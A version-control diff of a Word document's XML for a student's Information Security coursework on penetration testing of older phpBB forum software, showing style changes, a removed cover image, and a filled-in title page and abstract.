-    <w:lsdException w:name="Light List" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 1" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 1" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 1" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 1" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 1" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 1" w:uiPriority="65"/>
-    <w:lsdException w:name="Revision" w:semiHidden="1"/>
-    <w:lsdException w:name="List Paragraph" w:uiPriority="34" w:qFormat="1"/>
-    <w:lsdException w:name="Quote" w:uiPriority="29" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Quote" w:uiPriority="30" w:qFormat="1"/>
-    <w:lsdException w:name="Medium List 2 Accent 1" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 1" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 1" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 1" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 1" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 1" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 1" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 1" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 2" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 2" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 2" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 2" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 2" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 2" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 2" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 2" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 2" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 2" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 2" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 2" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 2" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 2" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 3" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 3" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 3" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 3" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 3" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 3" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 3" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 3" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 3" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 3" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 3" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 3" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 3" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 3" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 4" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 4" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 4" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 4" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 4" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 4" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 4" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 4" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 4" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 4" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 4" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 4" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 4" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 4" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 5" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 5" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 5" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 5" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 5" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 5" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 5" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 5" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 5" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 5" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 5" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 5" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 5" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 5" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 6" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 6" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 6" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 6" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 6" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 6" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 6" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 6" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 6" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 6" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 6" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 6" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 6" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 6" w:uiPriority="73"/>
-    <w:lsdException w:name="Subtle Emphasis" w:uiPriority="19" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Emphasis" w:uiPriority="21" w:qFormat="1"/>
-    <w:lsdException w:name="Subtle Reference" w:uiPriority="31" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Reference" w:uiPriority="32" w:qFormat="1"/>
-    <w:lsdException w:name="Book Title" w:uiPriority="33" w:qFormat="1"/>
-    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="Plain Table 1" w:uiPriority="41"/>
-    <w:lsdException w:name="Plain Table 2" w:uiPriority="42"/>
-    <w:lsdException w:name="Plain Table 3" w:uiPriority="43"/>
-    <w:lsdException w:name="Plain Table 4" w:uiPriority="44"/>
-    <w:lsdException w:name="Plain Table 5" w:uiPriority="45"/>
-    <w:lsdException w:name="Grid Table Light" w:uiPriority="40"/>
-    <w:lsdException w:name="Grid Table 1 Light" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 1" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 1" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 1" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 1" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 1" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 1" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 1" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 2" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 2" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 2" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 2" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 2" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 2" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 2" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 3" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 3" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 3" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 3" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 3" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 3" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 3" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 4" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 4" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 4" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 4" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 4" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 4" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 4" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 5" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 5" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 5" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 5" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 5" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 5" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 5" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 6" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 6" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 6" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 6" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 6" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 6" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 6" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 1" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 1" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 1" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 1" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 1" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 1" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 1" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 2" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 2" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 2" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 2" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 2" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 2" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 2" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 3" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 3" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 3" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 3" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 3" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 3" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 3" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 4" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 4" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 4" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 4" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 4" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 4" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 4" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 5" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 5" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 5" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 5" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 5" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 5" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 5" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 6" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 6" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 6" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 6" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
-  </w:latentStyles>
-  <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
-    <w:name w:val="Normal"/>
+  <w:style w:type="paragraph" w:styleId="ListParagraph">
+    <w:name w:val="List Paragraph"/>
+    <w:basedOn w:val="Normal"/>
+    <w:uiPriority w:val="34"/>
     <w:qFormat/>
+    <w:rsid w:val="00620CF2"/>
+    <w:pPr>
+      <w:ind w:left="720"/>
+      <w:contextualSpacing/>
+    </w:pPr>
   </w:style>
-  <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
-    <w:name w:val="Default Paragraph Font"/>
-    <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
+  <w:style w:type="paragraph" w:styleId="TOC2">
+    <w:name w:val="toc 2"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:autoRedefine/>
+    <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
-  </w:style>
-  <w:style w:type="table" w:default="1" w:styleId="TableNormal">
-    <w:name w:val="Normal Table"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-    <w:tblPr>
-      <w:tblInd w:w="0" w:type="dxa"/>
-      <w:tblCellMar>
-        <w:top w:w="0" w:type="dxa"/>
-        <w:left w:w="108" w:type="dxa"/>
-        <w:bottom w:w="0" w:type="dxa"/>
-        <w:right w:w="108" w:type="dxa"/>
-      </w:tblCellMar>
-    </w:tblPr>
-  </w:style>
-  <w:style w:type="numbering" w:default="1" w:styleId="NoList">
-    <w:name w:val="No List"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-  </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="0B02C6B12F0643A5B4F9493E038EE121">
-    <w:name w:val="0B02C6B12F0643A5B4F9493E038EE121"/>
-    <w:rsid w:val="00CA41D4"/>
-  </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="B09B4A07ED0246B193F87D52D2517B48">
-    <w:name w:val="B09B4A07ED0246B193F87D52D2517B48"/>
-    <w:rsid w:val="00CA41D4"/>
+    <w:rsid w:val="00A9604F"/>
+    <w:pPr>
+      <w:spacing w:after="100"/>
+      <w:ind w:left="220"/>
+    </w:pPr>
   </w:style>
 </w:styles>
-</file>
-
-<file path=word/glossary/webSettings.xml><?xml version="1.0" encoding="utf-8"?>
-<w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 w15">
-  <w:optimizeForBrowser/>
-  <w:allowPNG/>
-</w:webSettings>
 </file>
 
 <file path=word/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
@@ -2772,7 +3965,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{39DD35B1-F3E9-4FA5-879C-7EA482EA1A87}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{E4AF4333-EEA5-47BB-8C98-C03A33E7940B}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Modules/Information Security/Coursework/docs/Information_Security_Coursework_xw009807.docx
+++ b/Modules/Information Security/Coursework/docs/Information_Security_Coursework_xw009807.docx
@@ -17,6 +17,7 @@
           <w:docPartUnique/>
         </w:docPartObj>
       </w:sdtPr>
+      <w:sdtEndPr/>
       <w:sdtContent>
         <w:p>
           <w:pPr>
@@ -124,53 +125,6 @@
                                       <w:pPr>
                                         <w:jc w:val="right"/>
                                       </w:pPr>
-                                      <w:r>
-                                        <w:rPr>
-                                          <w:noProof/>
-                                          <w:lang w:eastAsia="en-GB"/>
-                                        </w:rPr>
-                                        <w:drawing>
-                                          <wp:inline distT="0" distB="0" distL="0" distR="0">
-                                            <wp:extent cx="3065006" cy="3831336"/>
-                                            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-                                            <wp:docPr id="139" name="Picture 139" descr="A picture of a winding road and trees" title="Road"/>
-                                            <wp:cNvGraphicFramePr>
-                                              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                                            </wp:cNvGraphicFramePr>
-                                            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                                              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                                                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                                                  <pic:nvPicPr>
-                                                    <pic:cNvPr id="2" name="tree crop.jpg"/>
-                                                    <pic:cNvPicPr/>
-                                                  </pic:nvPicPr>
-                                                  <pic:blipFill>
-                                                    <a:blip r:embed="rId8" cstate="print">
-                                                      <a:extLst>
-                                                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                                                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                                                        </a:ext>
-                                                      </a:extLst>
-                                                    </a:blip>
-                                                    <a:stretch>
-                                                      <a:fillRect/>
-                                                    </a:stretch>
-                                                  </pic:blipFill>
-                                                  <pic:spPr>
-                                                    <a:xfrm>
-                                                      <a:off x="0" y="0"/>
-                                                      <a:ext cx="3065006" cy="3831336"/>
-                                                    </a:xfrm>
-                                                    <a:prstGeom prst="rect">
-                                                      <a:avLst/>
-                                                    </a:prstGeom>
-                                                  </pic:spPr>
-                                                </pic:pic>
-                                              </a:graphicData>
-                                            </a:graphic>
-                                          </wp:inline>
-                                        </w:drawing>
-                                      </w:r>
                                     </w:p>
                                     <w:sdt>
                                       <w:sdtPr>
@@ -186,6 +140,7 @@
                                         <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                                         <w:text/>
                                       </w:sdtPr>
+                                      <w:sdtEndPr/>
                                       <w:sdtContent>
                                         <w:p>
                                           <w:pPr>
@@ -220,10 +175,10 @@
                                         <w:alias w:val="Subtitle"/>
                                         <w:tag w:val=""/>
                                         <w:id w:val="1354072561"/>
-                                        <w:showingPlcHdr/>
                                         <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:subject[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                                         <w:text/>
                                       </w:sdtPr>
+                                      <w:sdtEndPr/>
                                       <w:sdtContent>
                                         <w:p>
                                           <w:pPr>
@@ -239,7 +194,7 @@
                                               <w:sz w:val="24"/>
                                               <w:szCs w:val="24"/>
                                             </w:rPr>
-                                            <w:t>[Document subtitle]</w:t>
+                                            <w:t>PHP Penetration Testing</w:t>
                                           </w:r>
                                         </w:p>
                                       </w:sdtContent>
@@ -272,13 +227,9 @@
                                     </w:p>
                                     <w:sdt>
                                       <w:sdtPr>
-                                        <w:rPr>
-                                          <w:color w:val="000000" w:themeColor="text1"/>
-                                        </w:rPr>
                                         <w:alias w:val="Abstract"/>
                                         <w:tag w:val=""/>
                                         <w:id w:val="-2036181933"/>
-                                        <w:showingPlcHdr/>
                                         <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:Abstract[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
                                         <w:text/>
                                       </w:sdtPr>
@@ -290,10 +241,25 @@
                                             </w:rPr>
                                           </w:pPr>
                                           <w:r>
-                                            <w:rPr>
-                                              <w:color w:val="000000" w:themeColor="text1"/>
-                                            </w:rPr>
-                                            <w:t>[Draw your reader in with an engaging abstract. It is typically a short summary of the document. When you’re ready to add your content, just click here and start typing.]</w:t>
+                                            <w:t xml:space="preserve">This assignment investigates security vulnerabilities </w:t>
+                                          </w:r>
+                                          <w:r>
+                                            <w:t>with</w:t>
+                                          </w:r>
+                                          <w:r>
+                                            <w:t>in PHP software commonly used for hosting forums from a local WAMP server. A variety of older PHPBB versions and WAMP server are explored to locate and understand security issues</w:t>
+                                          </w:r>
+                                          <w:r>
+                                            <w:t xml:space="preserve"> that could</w:t>
+                                          </w:r>
+                                          <w:r>
+                                            <w:t xml:space="preserve"> be exploited. Methods of these exploits are researched</w:t>
+                                          </w:r>
+                                          <w:r>
+                                            <w:t xml:space="preserve"> and tested in this Document</w:t>
+                                          </w:r>
+                                          <w:r>
+                                            <w:t>.</w:t>
                                           </w:r>
                                         </w:p>
                                       </w:sdtContent>
@@ -311,6 +277,7 @@
                                         <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:creator[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                                         <w:text/>
                                       </w:sdtPr>
+                                      <w:sdtEndPr/>
                                       <w:sdtContent>
                                         <w:p>
                                           <w:pPr>
@@ -328,7 +295,16 @@
                                               <w:szCs w:val="26"/>
                                               <w:lang w:val="en-GB"/>
                                             </w:rPr>
-                                            <w:t>Tommy Bedford</w:t>
+                                            <w:t>Tom</w:t>
+                                          </w:r>
+                                          <w:r>
+                                            <w:rPr>
+                                              <w:color w:val="000000" w:themeColor="text1"/>
+                                              <w:sz w:val="26"/>
+                                              <w:szCs w:val="26"/>
+                                              <w:lang w:val="en-GB"/>
+                                            </w:rPr>
+                                            <w:t xml:space="preserve"> Bedford</w:t>
                                           </w:r>
                                         </w:p>
                                       </w:sdtContent>
@@ -351,6 +327,7 @@
                                           <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns1:category[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                                           <w:text/>
                                         </w:sdtPr>
+                                        <w:sdtEndPr/>
                                         <w:sdtContent>
                                           <w:r>
                                             <w:rPr>
@@ -426,53 +403,6 @@
                                 <w:pPr>
                                   <w:jc w:val="right"/>
                                 </w:pPr>
-                                <w:r>
-                                  <w:rPr>
-                                    <w:noProof/>
-                                    <w:lang w:eastAsia="en-GB"/>
-                                  </w:rPr>
-                                  <w:drawing>
-                                    <wp:inline distT="0" distB="0" distL="0" distR="0">
-                                      <wp:extent cx="3065006" cy="3831336"/>
-                                      <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-                                      <wp:docPr id="139" name="Picture 139" descr="A picture of a winding road and trees" title="Road"/>
-                                      <wp:cNvGraphicFramePr>
-                                        <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                                      </wp:cNvGraphicFramePr>
-                                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                                        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                                          <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                                            <pic:nvPicPr>
-                                              <pic:cNvPr id="2" name="tree crop.jpg"/>
-                                              <pic:cNvPicPr/>
-                                            </pic:nvPicPr>
-                                            <pic:blipFill>
-                                              <a:blip r:embed="rId8" cstate="print">
-                                                <a:extLst>
-                                                  <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                                                    <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                                                  </a:ext>
-                                                </a:extLst>
-                                              </a:blip>
-                                              <a:stretch>
-                                                <a:fillRect/>
-                                              </a:stretch>
-                                            </pic:blipFill>
-                                            <pic:spPr>
-                                              <a:xfrm>
-                                                <a:off x="0" y="0"/>
-                                                <a:ext cx="3065006" cy="3831336"/>
-                                              </a:xfrm>
-                                              <a:prstGeom prst="rect">
-                                                <a:avLst/>
-                                              </a:prstGeom>
-                                            </pic:spPr>
-                                          </pic:pic>
-                                        </a:graphicData>
-                                      </a:graphic>
-                                    </wp:inline>
-                                  </w:drawing>
-                                </w:r>
                               </w:p>
                               <w:sdt>
                                 <w:sdtPr>
@@ -488,6 +418,7 @@
                                   <w:dataBinding w:prefixMappings="xmlns:ns0='http://purl.org/dc/elements/1.1/' xmlns:ns1='http://schemas.openxmlformats.org/package/2006/metadata/core-properties' " w:xpath="/ns1:coreProperties[1]/ns0:title[1]" w:storeItemID="{6C3C8BC8-F283-45AE-878A-BAB7291924A1}"/>
                                   <w:text/>
